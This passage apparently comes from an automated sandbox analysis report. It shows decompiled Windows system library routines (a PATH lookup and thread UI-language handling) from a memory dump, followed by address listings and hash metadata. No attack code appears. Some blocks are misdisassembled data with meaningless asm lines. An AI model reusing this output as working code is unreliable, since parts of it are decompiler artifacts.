									_t295 = _t295 + 1;
									_v16 = _t295;
									__eflags = _t295 - _v48;
								} while (_t295 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t243 =  *(_v60 + _t322 * 4);
						if(_t243 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t243 * 4 +  &M04622935))) {
							case 0:
								__ax =  *0x46e8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t311 =  &_v64;
								_v80 = E04622E3E(0,  &_v64);
								_t281 = _t281 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x46e8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x46e8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0460EEF0(0x46e79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0460EB70(__ecx, 0x46e79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t217 = _v72;
											__eflags = _t217;
											if(_t217 != 0) {
												L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
											}
											_t218 = _v52;
											__eflags = _t218;
											if(_t218 != 0) {
												__eflags = _t330;
												if(_t330 < 0) {
													L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
													_t218 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t291 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x46e7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0460EB70(__ecx, 0x46e79a0);
										__eax = _v52;
										L36:
										_pop(_t323);
										_pop(_t331);
										__eflags = _v8 ^ _t335;
										_pop(_t282);
										return E0463B640(_t218, _t282, _v8 ^ _t335, _t311, _t323, _t331);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t277 = _v56;
								if(_v56 != 0) {
									_t311 =  &_v36;
									_t279 = E04622E3E(_t277,  &_v36);
									_t291 = _v36;
									_v76 = _t279;
								}
								if(_t291 == 0) {
									goto L44;
								} else {
									_t281 = _t281 + 2 + _t291;
								}
								goto L14;
							case 6:
								__eax =  *0x46e5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x46e8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x46e8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x46e6e58 & 0x0000ffff;
								__eax = ( *0x46e6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t322 = _t322 + 1;
								if(_t322 >= _v48) {
									goto L16;
								} else {
									_t311 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("bound eax, [esi]");
					 *((intOrPtr*)(_t311 + 4)) =  *((intOrPtr*)(_t311 + 4)) - _t243;
					asm("loopne 0x29");
					asm("bound eax, [esi+ebp]");
					asm("bound eax, [es:esi+eax*2]");
					 *((intOrPtr*)(_t311 + 4)) =  *((intOrPtr*)(_t311 + 4)) - _t243;
					_t244 = _t243 + 0x1f046226;
					asm("o16 add al, 0x94");
					 *((intOrPtr*)(_t311 + 4)) =  *((intOrPtr*)(_t311 + 4)) - _t244;
					_t245 = _t244 ^ 0x0204665b;
					 *((intOrPtr*)(_t311 + 4)) =  *((intOrPtr*)(_t311 + 4)) - _t339;
					 *_t245 =  *_t245 - 0x62;
					_t246 = _t245 + 0xf6;
					asm("daa");
					asm("bound eax, [esi+ebx]");
					 *((intOrPtr*)(_t311 + 4)) =  *((intOrPtr*)(_t311 + 4)) - _t246;
					_t332 = _t329 - 1;
					 *((intOrPtr*)(_t311 + 4)) =  *((intOrPtr*)(_t311 + 4)) - _t246;
					asm("daa");
					asm("bound eax, [eax+ebx*8]");
					_t287 = 0x25;
					asm("o16 add al, 0xb4");
					 *((intOrPtr*)(_t311 + 4)) =  *((intOrPtr*)(_t311 + 4)) - _t246;
					asm("o16 add al, 0xcc");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x46cff00);
					E0464D08C(_t287, _t324, _t332);
					_v44 =  *[fs:0x18];
					_t325 = 0;
					 *_a24 = 0;
					_t288 = _a12;
					__eflags = _t288;
					if(_t288 == 0) {
						_t250 = 0xc0000100;
					} else {
						_v8 = 0;
						_t333 = 0xc0000100;
						_v52 = 0xc0000100;
						_t252 = 4;
						while(1) {
							_v40 = _t252;
							__eflags = _t252;
							if(_t252 == 0) {
								break;
							}
							_t301 = _t252 * 0xc;
							_v48 = _t301;
							__eflags = _t288 -  *((intOrPtr*)(_t301 + 0x45d1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t267 = E0463E5C0(_a8,  *((intOrPtr*)(_t301 + 0x45d1668)), _t288);
									_t339 = _t339 + 0xc;
									__eflags = _t267;
									if(__eflags == 0) {
										_t333 = E046751BE(_t288,  *((intOrPtr*)(_v48 + 0x45d166c)), _a16, _t325, _t333, __eflags, _a20, _a24);
										_v52 = _t333;
										break;
									} else {
										_t252 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t252 = _t252 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t333;
						__eflags = _t333;
						if(_t333 < 0) {
							__eflags = _t333 - 0xc0000100;
							if(_t333 == 0xc0000100) {
								_t297 = _a4;
								__eflags = _t297;
								if(_t297 != 0) {
									_v36 = _t297;
									__eflags =  *_t297 - _t325;
									if( *_t297 == _t325) {
										_t333 = 0xc0000100;
										goto L76;
									} else {
										_t313 =  *((intOrPtr*)(_v44 + 0x30));
										_t254 =  *((intOrPtr*)(_t313 + 0x10));
										__eflags =  *((intOrPtr*)(_t254 + 0x48)) - _t297;
										if( *((intOrPtr*)(_t254 + 0x48)) == _t297) {
											__eflags =  *(_t313 + 0x1c);
											if( *(_t313 + 0x1c) == 0) {
												L106:
												_t333 = E04622AE4( &_v36, _a8, _t288, _a16, _a20, _a24);
												_v32 = _t333;
												__eflags = _t333 - 0xc0000100;
												if(_t333 != 0xc0000100) {
													goto L69;
												} else {
													_t325 = 1;
													_t297 = _v36;
													goto L75;
												}
											} else {
												_t257 = E04606600( *(_t313 + 0x1c));
												__eflags = _t257;
												if(_t257 != 0) {
													goto L106;
												} else {
													_t297 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t333 = E04622C50(_t297, _a8, _t288, _a16, _a20, _a24, _t325);
											L76:
											_v32 = _t333;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0460EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t333 = _a24;
									_t264 = E04622AE4( &_v36, _a8, _t288, _a16, _a20, _t333);
									_v32 = _t264;
									__eflags = _t264 - 0xc0000100;
									if(_t264 == 0xc0000100) {
										_v32 = E04622C50(_v36, _a8, _t288, _a16, _a20, _t333, 1);
									}
									_v8 = _t325;
									E04622ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t250 = _t333;
					}
					L70:
					return E0464D0D1(_t250);
				}
				L108:
			}

0x04622584
0x04622586
0x04622590
0x04622596
0x04622597
0x04622598
0x04622599
0x0462259e
0x046225a4
0x046225a9
0x046225ac
0x046225ae
0x046225b1
0x046225b2
0x046225b5
0x046225b8
0x046225bb
0x046225bc
0x046225bf
0x046225c2
0x046225c5
0x046225c6
0x046225cb
0x046225ce
0x046225d8
0x046225dd
0x046225de
0x046225e1
0x046225e3
0x046225e9
0x046226da
0x046226da
0x046226dd
0x046226e2
0x04665b56
0x00000000
0x046226e8
0x046226f9
0x046226fb
0x046226fe
0x04622700
0x04665b60
0x00000000
0x04622706
0x04622706
0x0462270a
0x0462270a
0x0462270d
0x04622713
0x04622716
0x04622718
0x0462271c
0x0462271e
0x04665b6c
0x04665b6f
0x04665b7f
0x04665b89
0x04665b8e
0x04665b93
0x04665b96
0x04665b9c
0x04665ba0
0x04665ba3
0x04665bab
0x04665bb0
0x04665bb3
0x04665bb3
0x04665ba3
0x04622724
0x04622726
0x04622729
0x0462272c
0x0462279d
0x0462279d
0x046227a0
0x046227a2
0x00000000
0x0462272e
0x0462272e
0x04622731
0x04622734
0x04622734
0x04622736
0x04665bc1
0x04665bc1
0x04665bc4
0x00000000
0x04665bca
0x04665bca
0x04665bcd
0x00000000
0x04665bd3
0x00000000
0x04665bd3
0x04665bcd
0x0462273c
0x0462273c
0x04622742
0x04622747
0x0462274a
0x0462274d
0x04622750
0x00000000
0x04622756
0x04622756
0x00000000
0x04622902
0x04622908
0x0462290b
0x00000000
0x04622911
0x0462291c
0x04622921
0x00000000
0x04622921
0x00000000
0x00000000
0x04622880
0x04622887
0x0462288c
0x00000000
0x00000000
0x04622805
0x0462280a
0x04622814
0x04622816
0x00000000
0x00000000
0x0462281e
0x04622821
0x04622823
0x00000000
0x04622829
0x04622829
0x04622831
0x0462283c
0x0462283e
0x00000000
0x0462283e
0x00000000
0x00000000
0x0462284e
0x04622850
0x04622851
0x04622854
0x04622857
0x0462285a
0x0462285c
0x0462285d
0x00000000
0x00000000
0x0462275d
0x04622761
0x00000000
0x04622767
0x0462276e
0x04622773
0x04622773
0x04622776
0x04622778
0x0462277e
0x0462277e
0x04622781
0x04622781
0x04622783
0x04622784
0x00000000
0x00000000
0x04665bd8
0x04665bde
0x04665be4
0x04665be6
0x04665be8
0x04665be9
0x04665bee
0x04665bf8
0x04665bff
0x04665c01
0x04665c04
0x04665c07
0x04665c0b
0x04665c0d
0x04665c0d
0x04665c15
0x04665c18
0x04665c1b
0x04665c1b
0x04665c1e
0x00000000
0x00000000
0x046228c3
0x046228c8
0x046228d2
0x046228d4
0x046228d8
0x046228db
0x04665c26
0x04665c28
0x04665c2d
0x04665c2d
0x00000000
0x00000000
0x04665c34
0x04665c36
0x04665c49
0x04665c4e
0x04665c54
0x04665c5b
0x04665c5d
0x04665c60
0x04622788
0x04622788
0x0462278b
0x0462278e
0x0462278e
0x0462278e
0x04622791
0x00000000
0x00000000
0x04622756
0x04622750
0x00000000
0x04622794
0x04622794
0x04622795
0x04622798
0x04622798
0x00000000
0x04622734
0x0462272c
0x04622700
0x046225ef
0x046225ef
0x046225ef
0x046225f2
0x046225f8
0x00000000
0x00000000
0x046225fe
0x00000000
0x046228e6
0x046228ec
0x046228ef
0x046228f5
0x046228f8
0x046228f8
0x00000000
0x046228f8
0x00000000
0x00000000
0x04622866
0x04622866
0x04622876
0x04622879
0x00000000
0x00000000
0x046227e0
0x046227e7
0x046227e9
0x046227eb
0x04665afd
0x00000000
0x04665afd
0x00000000
0x00000000
0x04622633
0x04622638
0x0462263b
0x0462263c
0x0462263e
0x04622640
0x04622642
0x04622647
0x04622649
0x0462264e
0x04622650
0x04622653
0x04622659
0x046226a2
0x046226a7
0x046226ac
0x046226b2
0x04665b11
0x04665b15
0x04665b17
0x00000000
0x046226b8
0x046226b8
0x046226ba
0x046227a6
0x046227a6
0x046227a9
0x046227ab
0x046227b9
0x046227b9
0x046227be
0x046227c1
0x046227c3
0x046227c5
0x046227c7
0x04665c74
0x04665c79
0x04665c79
0x046227c7
0x00000000
0x046226c0
0x046226c0
0x046226c3
0x046226c6
0x046226c6
0x046226c9
0x046226c9
0x00000000
0x046226c9
0x046226ba
0x0462265b
0x0462265b
0x0462265e
0x04622667
0x0462266d
0x04622677
0x0462267c
0x0462267f
0x04622681
0x04665b49
0x04665b4e
0x046227cd
0x046227d0
0x046227d1
0x046227d2
0x046227d4
0x046227dd
0x04622687
0x04622687
0x0462268a
0x0462268b
0x0462268e
0x0462268f
0x04622691
0x04622696
0x04622698
0x0462269d
0x0462269f
0x00000000
0x0462269f
0x04622681
0x00000000
0x00000000
0x04622846
0x00000000
0x00000000
0x04622605
0x0462260a
0x0462260c
0x04622611
0x04622616
0x04622619
0x04622619
0x0462261e
0x00000000
0x04622624
0x04622627
0x04622627
0x00000000
0x00000000
0x04665b1f
0x00000000
0x00000000
0x04622894
0x0462289b
0x0462289d
0x046228a1
0x04665b2b
0x04665b2e
0x04665b2e
0x046228a7
0x046228a9
0x04665b04
0x04665b09
0x04665b09
0x04665b09
0x00000000
0x00000000
0x04665b35
0x04665b3c
0x046228fb
0x046228fb
0x046226cc
0x046226cc
0x046226d0
0x00000000
0x046226d2
0x046226d2
0x00000000
0x046226d2
0x00000000
0x00000000
0x046225fe
0x0462292d
0x04622930
0x04622935
0x04622937
0x0462293a
0x0462293d
0x0462293f
0x04622942
0x04622946
0x04622949
0x0462294f
0x04622952
0x04622955
0x0462295a
0x0462295d
0x04622960
0x04622962
0x04622963
0x04622966
0x04622969
0x0462296a
0x0462296e
0x0462296f
0x04622972
0x04622973
0x04622976
0x0462297b
0x0462297e
0x0462297f
0x04622980
0x04622981
0x04622982
0x04622983
0x04622984
0x04622985
0x04622986
0x04622987
0x04622988
0x04622989
0x0462298a
0x0462298b
0x0462298c
0x0462298d
0x0462298e
0x0462298f
0x04622990
0x04622992
0x04622997
0x046229a3
0x046229a6
0x046229ab
0x046229ad
0x046229b0
0x046229b2
0x04665c80
0x046229b8
0x046229b8
0x046229bb
0x046229c0
0x046229c5
0x046229c6
0x046229c6
0x046229c9
0x046229cb
0x00000000
0x00000000
0x046229cd
0x046229d0
0x046229d9
0x046229db
0x046229dd
0x04622a7f
0x04622a84
0x04622a87
0x04622a89
0x04665ca1
0x04665ca3
0x00000000
0x04622a8f
0x04622a8f
0x00000000
0x04622a8f
0x00000000
0x046229e3
0x046229e3
0x046229e3
0x00000000
0x046229e3
0x046229dd
0x00000000
0x046229db
0x046229e6
0x046229e9
0x046229eb
0x046229ed
0x046229f3
0x046229f5
0x046229f8
0x046229fa
0x04622a97
0x04622a9a
0x04622a9d
0x04622add
0x00000000
0x04622a9f
0x04622aa2
0x04622aa5
0x04622aa8
0x04622aab
0x04665cab
0x04665caf
0x04665cc5
0x04665cda
0x04665cdc
0x04665cdf
0x04665ce5
0x00000000
0x04665ceb
0x04665ced
0x04665cee
0x00000000
0x04665cee
0x04665cb1
0x04665cb4
0x04665cb9
0x04665cbb
0x00000000
0x04665cbd
0x04665cbd
0x00000000
0x04665cbd
0x04665cbb
0x04622ab1
0x04622ab1
0x04622ac4
0x04622ac6
0x04622ac6
0x00000000
0x04622ac6
0x04622aab
0x00000000
0x04622a00
0x04622a09
0x04622a0e
0x04622a21
0x04622a24
0x04622a35
0x04622a3a
0x04622a3d
0x04622a42
0x04622a59
0x04622a59
0x04622a5c
0x04622a5f
0x04622a5f
0x046229fa
0x046229f3
0x04622a64
0x04622a64
0x04622a6b
0x04622a6b
0x04622a6d
0x04622a72
0x04622a72
0x00000000

Strings

PATH, xrefs: 04622642, 04622691

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: e4ddab2b6eded8f355b254af17ea9ca24262a196d4d1af075577fdb05b256bc8
Instruction ID: 85e191f1228a3dc388dfb713252d9bef828d005989933a980054eb96d1538d71
Opcode Fuzzy Hash: e4ddab2b6eded8f355b254af17ea9ca24262a196d4d1af075577fdb05b256bc8
Instruction Fuzzy Hash: C5C19EB1E00629EBDB25DF99D9A0AADB7B1FF58704F044069E401AB350F734B942CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0462FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0462FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0460EEF0(0x46e7b60);
					_t134 =  *0x46e7b84; // 0x773b7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x46e7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x46e7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04606D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E046076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04698938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E045FB150();
													}
													_t116 = E04696D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E046075CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x46e8638; // 0x940b00
																	_t122 = L046038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E046076E2(_t154);
																			goto L41;
																		}
																	} else {
																		E046076E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0462FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L046070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0462FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0462FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0462FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0462FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0462FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x46e7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x46e7b84 = _t75;
						_t73 = E0460EB70(_t134, 0x46e7b60);
						if( *0x46e7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0460FF60( *0x46e7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0462fab0
0x0462fab2
0x0462fab3
0x0462fab4
0x0462fabc
0x0462fac0
0x0462fb14
0x0462fb17
0x0462fac2
0x0462fac8
0x0462facd
0x0462fad3
0x0462fad3
0x0462fadd
0x0462fb18
0x0462fb1b
0x0462fb1d
0x0462fb1e
0x0462fb1f
0x0462fb20
0x0462fb21
0x0462fb22
0x0462fb23
0x0462fb24
0x0462fb25
0x0462fb26
0x0462fb27
0x0462fb28
0x0462fb29
0x0462fb2a
0x0462fb2b
0x0462fb2c
0x0462fb2d
0x0462fb2e
0x0462fb2f
0x0462fb3a
0x0462fb3b
0x0462fb3e
0x0462fb41
0x0462fb44
0x0462fb47
0x0462fb4a
0x0462fb4d
0x0462fb53
0x0466bdcb
0x0466bdcb
0x0462fb59
0x0462fb5b
0x0462fb5b
0x0462fb5e
0x0466bdd5
0x0466bdd8
0x00000000
0x0466bdda
0x00000000
0x0466bdda
0x0462fb64
0x0462fb64
0x0462fb64
0x0462fb67
0x0462fb6e
0x0462fb70
0x0462fb72
0x00000000
0x0462fb78
0x0462fb7a
0x0462fb7a
0x0462fb7d
0x0462fb80
0x0466bddf
0x0466bde1
0x00000000
0x0466bde3
0x00000000
0x0466bde3
0x0462fb86
0x0462fb86
0x0462fb86
0x0462fb8b
0x0462fb90
0x0462fb92
0x0462fb94
0x0462fb9a
0x0462fb9b
0x0462fba1
0x0466bde8
0x0466bdeb
0x0466bded
0x0466beb5
0x0466beb5
0x0466bebb
0x0466bebd
0x0466bec3
0x0466bed2
0x0466bedd
0x0466bedd
0x0466beed
0x00000000
0x0466bdf3
0x0466bdfe
0x0466be06
0x0466be0b
0x0466be0d
0x0466be0f
0x0466be14
0x0466be19
0x0466be20
0x0466be25
0x0466be27
0x0466be35
0x0466be39
0x0466be46
0x0466be4f
0x0466be54
0x0466be56
0x0466bef8
0x0466bef8
0x00000000
0x0466be5c
0x0466be5c
0x0466be60
0x00000000
0x0466be66
0x0466be66
0x0466be7f
0x0466be84
0x0466be87
0x0466be89
0x0466be8b
0x0466be99
0x0466be9d
0x0466bea0
0x0466beac
0x0466beaf
0x0466beb1
0x0466beb3
0x0466beb3
0x00000000
0x0466bea2
0x0466bea2
0x00000000
0x0466bea2
0x0466be8d
0x0466be8d
0x0466be92
0x00000000
0x0466be92
0x0466be8b
0x0466be60
0x0466be3b
0x0466be3b
0x0466be3e
0x00000000
0x0466be40
0x0466be40
0x0466be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0466be44
0x0466be3e
0x0466be29
0x0466be29
0x00000000
0x0466be29
0x0466be27
0x00000000
0x0462fba7
0x0462fba7
0x0462fbab
0x0466bf02
0x0462fbb1
0x0462fbb1
0x0462fbb8
0x0462fbbd
0x0462fbbd
0x0462fbbf
0x0462fbbf
0x0462fbc5
0x0462fbcb
0x0462fbf8
0x0462fbf8
0x0462fbfa
0x00000000
0x0462fc00
0x0462fc00
0x0462fc03
0x00000000
0x0462fc09
0x0462fc09
0x0462fc0f
0x0462fc15
0x0462fc23
0x0462fc23
0x0462fc25
0x0462fc27
0x0462fc75
0x0462fc7c
0x0462fc84
0x00000000
0x0462fc29
0x0462fc29
0x0462fc2d
0x0462fc30
0x0466bf0f
0x00000000
0x0462fc36
0x0462fc38
0x0462fc3b
